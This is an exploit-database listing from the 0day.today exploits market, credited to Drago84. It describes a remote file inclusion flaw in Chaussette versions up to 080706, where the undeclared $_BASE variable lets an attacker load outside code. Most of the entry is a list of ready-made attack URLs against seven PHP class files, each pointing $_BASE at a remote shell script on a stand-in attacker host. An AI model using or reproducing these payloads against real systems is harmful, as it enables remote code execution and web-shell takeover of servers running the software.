[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-680
Category
web applications
Date add
09-08-2006
Platform
unsorted
================================================================
Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities
================================================================



Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84


Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem Is :
$_BASE Not Declare;


ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php




#  0day.today [2024-12-25]  #